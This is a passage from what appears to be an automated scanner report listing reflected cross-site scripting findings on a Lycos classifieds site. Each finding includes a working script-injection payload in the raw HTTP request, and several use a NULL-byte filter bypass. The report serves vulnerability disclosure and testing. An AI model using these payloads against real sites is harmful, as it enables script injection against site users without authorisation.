Content-Length: 17712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community-ridesharedd2ff"><script>alert(1)</script>01dce6dd8cf/?mobile=1" rel="nofollow">
...[SNIP]...

1.13. http://classifieds.lycos.com/community-rideshare/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community-rideshare/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6eae"><script>alert(1)</script>49cb3ea26e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community-rideshare/?a6eae"><script>alert(1)</script>49cb3ea26e6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:25 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community-rideshare/?a6eae"><script>alert(1)</script>49cb3ea26e6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.14. http://classifieds.lycos.com/community/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f906"><script>alert(1)</script>0ecae4b5915 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community4f906"><script>alert(1)</script>0ecae4b5915/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community4f906"><script>alert(1)</script>0ecae4b5915/?mobile=1" rel="nofollow">
...[SNIP]...

1.15. http://classifieds.lycos.com/community/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9635"><script>alert(1)</script>84af8c3ea5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /community/?c9635"><script>alert(1)</script>84af8c3ea5c=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/community/?c9635"><script>alert(1)</script>84af8c3ea5c=1&mobile=1" rel="nofollow">
...[SNIP]...

1.16. http://classifieds.lycos.com/housing-rent-apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c87"><script>alert(1)</script>4bae919137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment62c87"><script>alert(1)</script>4bae919137/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:30 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment62c87"><script>alert(1)</script>4bae919137/?mobile=1" rel="nofollow">
...[SNIP]...

1.17. http://classifieds.lycos.com/housing-rent-apartment/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5793d"><script>alert(1)</script>d1a9830cbd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/?5793d"><script>alert(1)</script>d1a9830cbd5=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 63370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/?5793d"><script>alert(1)</script>d1a9830cbd5=1&mobile=1" rel="nofollow">
...[SNIP]...

1.18. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7f1f"><script>alert(1)</script>e88f4b85db9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartmentd7f1f"><script>alert(1)</script>e88f4b85db9/edgewater-beach-huge-2-br-2416172356 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:49 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartmentd7f1f"><script>alert(1)</script>e88f4b85db9/edgewater-beach-huge-2-br-2416172356?mobile=1" rel="nofollow">
...[SNIP]...

1.19. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001a8a3"><script>alert(1)</script>cc957f8555f was submitted in the REST URL parameter 2. This input was echoed as 1a8a3"><script>alert(1)</script>cc957f8555f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356%001a8a3"><script>alert(1)</script>cc957f8555f HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356%001a8a3"><script>alert(1)</script>cc957f8555f?mobile=1" rel="nofollow">
...[SNIP]...

1.20. http://classifieds.lycos.com/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee82"><script>alert(1)</script>e2446b54b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/edgewater-beach-huge-2-br-2416172356?bee82"><script>alert(1)</script>e2446b54b9=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:19 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 23916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/edgewater-beach-huge-2-br-2416172356?bee82"><script>alert(1)</script>e2446b54b9=1&mobile=1" rel="nofollow">
...[SNIP]...

1.21. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171985

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c683a"><script>alert(1)</script>8715acf427 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartmentc683a"><script>alert(1)</script>8715acf427/fair-oaks-apartments-2416171985 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartmentc683a"><script>alert(1)</script>8715acf427/fair-oaks-apartments-2416171985?mobile=1" rel="nofollow">
...[SNIP]...

1.22. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171985

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0087882"><script>alert(1)</script>c0553fe1d09 was submitted in the REST URL parameter 2. This input was echoed as 87882"><script>alert(1)</script>c0553fe1d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171985%0087882"><script>alert(1)</script>c0553fe1d09 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171985%0087882"><script>alert(1)</script>c0553fe1d09?mobile=1" rel="nofollow">
...[SNIP]...

1.23. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171985 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171985

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aeb3"><script>alert(1)</script>3b560751ac5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171985?4aeb3"><script>alert(1)</script>3b560751ac5=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:11 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
Set-Cookie: classifieds[lastpage][0][name]=Apartments+for+Rent; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171985?4aeb3"><script>alert(1)</script>3b560751ac5=1&mobile=1" rel="nofollow">
...[SNIP]...

1.24. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171997

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3123a"><script>alert(1)</script>f524eb41f7c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment3123a"><script>alert(1)</script>f524eb41f7c/fair-oaks-apartments-2416171997 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:50 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment3123a"><script>alert(1)</script>f524eb41f7c/fair-oaks-apartments-2416171997?mobile=1" rel="nofollow">
...[SNIP]...

1.25. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171997

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001175e"><script>alert(1)</script>a496097bfe7 was submitted in the REST URL parameter 2. This input was echoed as 1175e"><script>alert(1)</script>a496097bfe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171997%001175e"><script>alert(1)</script>a496097bfe7 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:43 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/housing-rent-apartment/fair-oaks-apartments-2416171997%001175e"><script>alert(1)</script>a496097bfe7?mobile=1" rel="nofollow">
...[SNIP]...

1.26. http://classifieds.lycos.com/housing-rent-apartment/fair-oaks-apartments-2416171997 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /housing-rent-apartment/fair-oaks-apartments-2416171997

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 218a8"><script>alert(1)</script>ab9259f54a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing-rent-apartment/fair-oaks-apartments-2416171997?218a8"><script>alert(1)</script>ab9259f54a3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:13 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=housing%2Frent%2Fapartment; path=/
